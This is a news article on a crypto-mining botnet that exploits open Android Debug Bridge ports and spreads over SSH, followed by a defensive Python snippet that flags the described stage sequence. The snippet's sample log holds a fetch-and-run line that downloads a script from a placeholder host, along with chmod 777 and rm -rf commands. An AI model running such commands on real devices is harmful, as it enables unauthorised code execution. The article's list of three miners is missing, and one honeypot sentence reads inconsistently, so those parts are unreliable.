A new cryptocurrency-mining botnet has been found exploiting open Android Debug Bridge (ADB) ports. ADB is a developer interface built for debugging app defects, and it is present on a majority of Android phones and tablets.
The botnet malware, as reported by Trend Micro, was detected in 21 countries and is most widespread in South Korea.
The attack takes advantage of the fact that open ADB ports do not require authentication by default, and once installed the malware is designed to spread to any device that has previously shared an SSH connection with the infected host. SSH connections link a wide range of devices, from mobile phones to Internet of Things (IoT) gadgets, which means a large number of products are susceptible.
“Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange; each system considers the other as safe,” the researchers say. “The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.”
The attack begins with an IP address that arrives through ADB and uses the command shell to change the working directory to “/data/local/tmp,” since files in .tmp directories often have default permissions that allow commands to be executed.
As soon as the bot determines it has entered a honeypot, it uses the wget command to download the payload of three distinct miners, falling back to curl if wget is not present on the infected system.
The malware determines which miner is best suited to exploit the victim depending on the system’s manufacturer, architecture, processor type, and hardware.
An additional command, chmod 777 a.sh, is then executed to change the permissions of the dropped malicious script. Finally, the bot conceals itself from the host with another command, rm -rf a.sh*, which deletes the downloaded file. This also hides the trail of where the malware originated as it spreads to other victims.
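As an added illustration, not code from the article or from Trend Micro, the following Python snippet flags ADB shell sessions that follow the stage sequence just described (change to /data/local/tmp, wget/curl download, chmod 777, rm -rf cleanup). The session records and the PLACEHOLDER download host are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of (session_id, shell command) records, such as a
# honeypot or device audit log might produce. Not real captured data.
SAMPLE_LOG = [
    ("sess-1", "id"),
    ("sess-1", "cd /data/local/tmp"),
    ("sess-1", "wget http://PLACEHOLDER.invalid/a.sh || curl -O http://PLACEHOLDER.invalid/a.sh"),
    ("sess-1", "chmod 777 a.sh"),
    ("sess-1", "sh a.sh"),
    ("sess-1", "rm -rf a.sh*"),
    ("sess-2", "cd /data/local/tmp"),   # benign developer session: only one stage
    ("sess-2", "ls"),
    ("sess-3", "wget http://PLACEHOLDER.invalid/update.bin"),
]

# Each stage of the chain the article describes, as a name and a pattern.
STAGES = [
    ("tmp_workdir", re.compile(r"\bcd\s+/data/local/tmp\b")),
    ("fetch_payload", re.compile(r"\b(wget|curl)\b")),
    ("world_writable", re.compile(r"\bchmod\s+777\b")),
    ("cleanup", re.compile(r"\brm\s+-rf\b")),
]


def classify_sessions(records):
    """Return {session_id: [stage names, in the order first seen]}."""
    hits = defaultdict(list)
    for sid, cmd in records:
        stages = hits[sid]          # ensures every session gets an entry
        for name, pat in STAGES:
            if pat.search(cmd) and name not in stages:
                stages.append(name)
    return dict(hits)


def suspicious_sessions(records, min_stages=3):
    """Sessions matching at least min_stages of the chain; one stage alone
    (a developer cd, a lone wget) is not enough to raise an alert."""
    return {sid: st for sid, st in classify_sessions(records).items()
            if len(st) >= min_stages}
```

The threshold is deliberately on the whole chain rather than any single command, since each step on its own is common in legitimate ADB use.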
Experts examined the invading script and identified the three potential miners, all delivered from the same URL, that can be used in the attack:
They also found that the script enables HugePages on the host, which allows memory pages larger than the default size, to optimize mining throughput.
If other miners are already found running on the system, the botnet attempts to invalidate their URLs by modifying the host code and kills them.
Malicious crypto-mining droppers are continually evolving new ways to exploit their victims. Last summer, Trend Micro observed another ADB-exploiting botnet, which they dubbed the Satoshi Variant.
Outlaw was spotted in recent weeks spreading an additional Monero mining variant across China through brute-force attacks against servers. At the time, experts had not determined whether the botnet had started mining operations, but they found an Android APK in the script, indicating that Android devices may be targeted.